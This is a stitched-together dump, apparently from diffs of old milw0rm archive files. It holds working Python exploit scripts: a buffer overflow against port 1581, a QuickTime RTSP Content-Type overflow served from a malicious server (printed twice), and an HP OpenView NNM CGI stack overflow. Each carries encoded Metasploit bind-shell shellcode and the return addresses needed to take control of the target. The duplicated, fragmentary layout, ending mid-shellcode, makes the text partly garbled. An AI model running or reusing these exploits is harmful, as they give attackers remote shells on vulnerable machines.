"\x76\x52\x75\x4b\x4f\x5a\x70\x71\x76\x31\x7a\x55\x34\x31\x76\x72"
"\x48\x50\x63\x72\x4d\x6f\x79\x78\x65\x53\x5a\x72\x70\x72\x79\x76"
"\x49\x78\x4c\x4b\x39\x4d\x37\x53\x5a\x32\x64\x6d\x59\x6a\x42\x37"
"\x41\x6b\x70\x4b\x43\x4f\x5a\x49\x6e\x63\x72\x56\x4d\x49\x6e\x30"
"\x42\x64\x6c\x6d\x43\x6c\x4d\x62\x5a\x75\x68\x6c\x6b\x6e\x4b\x6e"
"\x4b\x50\x68\x43\x42\x49\x6e\x6c\x73\x62\x36\x69\x6f\x74\x35\x30"
"\x44\x6b\x4f\x48\x56\x53\x6b\x70\x57\x73\x62\x71\x41\x70\x51\x76"
"\x31\x63\x5a\x57\x71\x42\x71\x66\x31\x72\x75\x71\x41\x49\x6f\x68"
"\x50\x75\x38\x4c\x6d\x79\x49\x74\x45\x5a\x6e\x32\x73\x4b\x4f\x6e"
"\x36\x72\x4a\x6b\x4f\x6b\x4f\x50\x37\x79\x6f\x4e\x30\x6e\x6b\x46"
"\x37\x69\x6c\x4f\x73\x69\x54\x52\x44\x49\x6f\x4b\x66\x43\x62\x6b"
"\x4f\x5a\x70\x51\x78\x7a\x50\x4f\x7a\x76\x64\x31\x4f\x33\x63\x4b"
"\x4f\x48\x56\x49\x6f\x48\x50\x61")
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[*] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 1581 ) )
print "[*] Sending evil buffer, ph33r"
expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n')
expl.close()
print "[*] Check port 4444 for bindshell"
# milw0rm.com [2007-10-27]


@ -1,125 +1,125 @@
#!/usr/bin/python
##########################################################################
# http://www.offensive-security.com
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
# re-edited by muts and javaguru1999 to annoy Symantec
# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html
# there IS NO SPOON!
##########################################################################
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,
# the attack appears to be prevented because standard buffer overflow
# prevention processes act before any damage can be done, Florio wrote.
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,
# the exploit works against Firefox if QuickTime is the default multimedia player,
# according to Florio."
##########################################################################
# Calling Quicktime via URL kicks in an Extra Exception Handler,
# of which we have no control over.
# By making the buffer larger than the original exploit, we can overwrite
# the last exception handler, and regain control over execution.
# This is indeed an evil exploit - muhaha.
##########################################################################
from socket import *
header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
'Content-Type: %s\r\n' # <-- overflow
'Content-Length: %d\r\n'
'\r\n')
body = (
'v=0\r\n'
'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'i=1.mp3\r\n'
't=0 0\r\n'
'a=tool:ciamciaramcia\r\n'
'a=type:broadcast\r\n'
'a=control:*\r\n'
'a=range:npt=0-213.077\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'a=x-qt-text-inf:1.mp3\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4 0.0.0.0\r\n'
'a=control:track1\r\n'
)
# ExitProcess shellcode will kill browser, but keep the shell open
shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61"
"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53"
"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e"
"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46"
"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50"
"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b"
"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b"
"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69"
"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36"
"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44"
"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56"
"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74"
"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53"
"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a"
"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71"
"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78"
"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f"
"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32"
"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c"
"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33"
"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51"
"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51"
"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41"
"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e"
"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39"
"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b"
"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e"
"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38"
"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31"
"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46"
"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30"
"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73"
"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e"
"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32"
"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30"
"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e"
"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58"
"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41"
"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b"
"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b"
"\x4f\x48\x56\x69\x6f\x6a\x70\x42")
tmp = "A" * 987
tmp +="\xeb\x20\x90\x90" # short jump for 7.2
tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3
tmp += "\x90" * 92
tmp += shellcode
tmp += "\x41" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions.
header %= (tmp, len(body))
evil = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()
# milw0rm.com [2007-11-26]
#!/usr/bin/python
##########################################################################
# http://www.offensive-security.com
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
# re-edited by muts and javaguru1999 to annoy Symantec
# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html
# there IS NO SPOON!
##########################################################################
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,
# the attack appears to be prevented because standard buffer overflow
# prevention processes act before any damage can be done, Florio wrote.
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,
# the exploit works against Firefox if QuickTime is the default multimedia player,
# according to Florio."
##########################################################################
# Calling Quicktime via URL kicks in an Extra Exception Handler,
# of which we have no control over.
# By making the buffer larger than the original exploit, we can overwrite
# the last exception handler, and regain control over execution.
# This is indeed an evil exploit - muhaha.
##########################################################################
from socket import *
header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
'Content-Type: %s\r\n' # <-- overflow
'Content-Length: %d\r\n'
'\r\n')
body = (
'v=0\r\n'
'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'i=1.mp3\r\n'
't=0 0\r\n'
'a=tool:ciamciaramcia\r\n'
'a=type:broadcast\r\n'
'a=control:*\r\n'
'a=range:npt=0-213.077\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'a=x-qt-text-inf:1.mp3\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4 0.0.0.0\r\n'
'a=control:track1\r\n'
)
# ExitProcess shellcode will kill browser, but keep the shell open
shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61"
"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53"
"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e"
"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46"
"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50"
"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b"
"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b"
"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69"
"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36"
"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44"
"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56"
"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74"
"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53"
"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a"
"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71"
"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78"
"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f"
"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32"
"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c"
"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33"
"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51"
"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51"
"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41"
"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e"
"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39"
"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b"
"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e"
"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38"
"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31"
"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46"
"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30"
"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73"
"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e"
"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32"
"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30"
"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e"
"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58"
"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41"
"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b"
"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b"
"\x4f\x48\x56\x69\x6f\x6a\x70\x42")
tmp = "A" * 987
tmp +="\xeb\x20\x90\x90" # short jump for 7.2
tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3
tmp += "\x90" * 92
tmp += shellcode
tmp += "\x41" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions.
header %= (tmp, len(body))
evil = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()
# milw0rm.com [2007-11-26]


@ -1,89 +1,89 @@
#!/usr/bin/python
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
# Notes:
# Vanilla stack based overflow
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking
# the entry point and injecting Sleep just before exe execution. This gave me enough
# time to attach a debugger before program termination. If anyone knows how to properly
# debug this, please tell me about it - there *must* be a better way...
#
# bt tools # ./sploit 192.168.1.105
# [+] Connecting to 192.168.1.105
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
#
# bt tools # nc -nv 192.168.1.105 4444
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
import socket
import os
import sys
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGI\n"
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="A"*5123
buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
buffer+="\x90"*32
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42"
"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50"
"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71"
"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c"
"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64"
"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55"
"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e"
"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a"
"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78"
"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54"
"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76"
"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50"
"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64"
"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63"
"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b"
"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70"
"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a"
"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c"
"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73"
"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c"
"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51"
"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62"
"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75"
"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51"
"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c"
"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b"
"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79"
"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f"
"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58"
"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33"
"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44"
"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54"
"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30"
"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c"
"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51"
"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33"
"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48"
"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a"
"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73"
"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b"
"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b"
"\x4f\x6b\x66\x79\x6f\x58\x50\x68")
buffer+="\r\n\r\n"
expl.send (buffer)
expl.close()
print "[+] Payload Sent, ph33r."
# milw0rm.com [2007-12-12]
#!/usr/bin/python
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
# Notes:
# Vanilla stack based overflow
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking
# the entry point and injecting Sleep just before exe execution. This gave me enough
# time to attach a debugger before program termination. If anyone knows how to properly
# debug this, please tell me about it - there *must* be a better way...
#
# bt tools # ./sploit 192.168.1.105
# [+] Connecting to 192.168.1.105
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
#
# bt tools # nc -nv 192.168.1.105 4444
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
import socket
import os
import sys
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGI\n"
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="A"*5123
buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
buffer+="\x90"*32
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42"
"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50"
"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71"
"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c"
"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64"
"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55"
"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e"
"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a"
"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78"
"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54"
"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76"
"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50"
"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64"
"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63"
"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b"
"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70"
"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a"
"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c"
"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73"
"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c"
"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51"
"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62"
"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75"
"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51"
"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c"
"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b"
"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79"
"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f"
"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58"
"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33"
"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44"
"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54"
"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30"
"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c"
"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51"
"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33"
"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48"
"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a"
"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73"
